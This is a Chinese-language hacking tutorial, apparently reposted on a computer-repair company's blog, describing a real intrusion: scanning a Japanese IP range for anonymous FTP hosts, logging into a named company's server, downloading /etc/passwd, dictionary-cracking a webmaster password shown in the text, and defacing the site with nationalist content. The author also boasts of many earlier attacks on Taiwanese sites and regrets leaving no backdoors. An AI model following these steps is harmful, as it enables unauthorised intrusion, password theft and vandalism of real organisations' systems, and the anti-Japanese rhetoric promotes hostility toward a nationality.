关于允许匿名登陆的主机的简单入侵
如果说一个匿名用户在FTP服务器的匿名区域获得了一份不应该是匿名用户获得的文件,那么就说明了可能有外部客户将这个文件放置在匿名的FTP区域了。
在很多网络攻击事例中用匿名用户可以阅读到/etc/passwd文件这就是办理员很大错误体现。还有隐患是telnet到ftp21如果允许实行SITE CHMOD和SITE EXEC、/home的所有者是匿名FTP的用户,那么任意就可把权限设置成777或者更多的进行修改等等。
先下载FTP scanner 这个软件,我们必要用到它。
杀毒,安置好后,我们从开端菜单中的程序中找到FTP Scanner并运行它。
我们熟悉一下我们要利用的软件的界面。
翻开软件我们可以看到
Host 主机
Beginning 开端IP
下面有几个文本框
我们在这里填入我们要开端扫描的IP.
Ending 结束IP
下面有几个文本框
我们在这里填入我们结束扫描的IP.
在下面有一个
Threads 线程
我们可以根据网速来选择这里的线程数.
通常Moden上彀选为50--70左右.
更快的话选到100个线程.
然后我们选择菜单Session 里的Begin FTP scan
就可以开端了扫描了..
======================================
应用技巧:
我们可以在View 里的options选项里选择我们的扫描参数.
在Login config里
里的UserName 和 Password我们通常不用变动.
但你也可以改动他.
比如你想扫描特定的帐号.比如扫描用户 Oracle暗码也是Oracle的话
就改动这里的 UserName 和 Password
在IP Logging里
我们可以变动扫描结果寄存的位置.
任意选择一个位置和文件名就可以了.
默认是寄存在安置目次下面的iplog.txt文件.
======================================
台湾的机器我们干掉的太多了,伤及了很多布衣网站,在这里我对我以前的行为作出检讨. 这次,我们往日本看看。相信各人不会不恨小日本吧.
去搜狐网站敲了一个“日本”,搜刮一下,找到1000多个相关网站。
然后,任意挑了一个: www.jcbus.co.jp ping www.jcbus.co.jp
得到它的IP。
210.143.99.80
我们来扫描
210.143.99.1-------210.143.99.254
因为我们不是对特定的主机来攻击.现在我们做的只是在一堆机器内里找.呵呵:)
过了几分钟
结果出来了,找到了10台.
我们离开安置这个扫描器的目次下查看iplog.txt
可以看到.
210.143.99.21
210.143.99.68
210.143.99.80==*
210.143.99.94
210.143.99.121
210.143.99.130
210.143.99.189
210.143.99.175
210.143.99.200
210.143.99.249
运气不错,看到了吗?
www.jcbus.co.jp是可以匿名进去的.
我们就进这个看看吧.:)
C:\>ftp 210.143.99.80
Connected to ns.jcbus.co.jp. 220 ns.jcbus.co.jp FTP server (Version wu-2.4.2-academ[BETA-15](1) Tue Jan 19 00 :22:43 GMT 1999) ready.
User (ns.jcbus.co.jp:(none)):
呵呵 Wu-ftp 2.4.2?
好象有很大的毛病哦.:)
不过不在我们本日的教程先容范围.
我们用FTP进去看看.
User (210.143.99.200:(none)): ftp
331 Guest login ok, send your complete e-mail address as password.
Password: ftp@ ----(可以任意输出)
230-The response 'ftp' is not valid 230-Next time please use your e-mail address as your password
230- for example: joe@202.104.49.193
230Guest login ok, access restrictions apply.
ftp>
呵呵
先看看能不能去根目次.
ftp> cd /
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (202.104.49.193,2643) (0 bytes).
bin
cdrom
dev
devices
etc
....
....
....
ASCII Transfer complete.
ftp: 161 bytes received in 0.81Seconds 0.20Kbytes/sec. ftp>
呵呵
实行乐成:)
但在它的网页的目次里我没有写权限.:(
只好先把暗码档先当下来.
ftp> get /etc/passwd
把暗码档搞下来.
然后用小榕的流光提取用户.
26个用户.
挂上一个小字典跑.
几分钟过去后,
终于找到一个可以利用的shell了.
user: webmaster
passwd: web
呵呵
上载了一个剧本,后果嘛,就不用我多说了,放上一段国歌,插上国旗,找了两个网友欣赏了一下.
1个小时后,网页规复了.
我回去看了看ftp和webmaster都不能登岸了. 倒
早知道给他留几个后门.:(
这是一次关于允许匿名登岸的主机的简略入侵
是Redhat 4.2
实在我们可以发明,NT系统的允许匿名登岸的主机更多,很多主机更离谱的是.anonymous竟然有到根目次和写的权限,能够找到的更多,不知道他们是怎么搞的,通常可以找到的是Web是IIS4.0 IIS3.0的NT.国内的如许的机器真的不少,不过我发明日本的redhat倒真的不少.有几个网段我扫描过的竟然清一色全部是redhat.
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
评论加载中...
|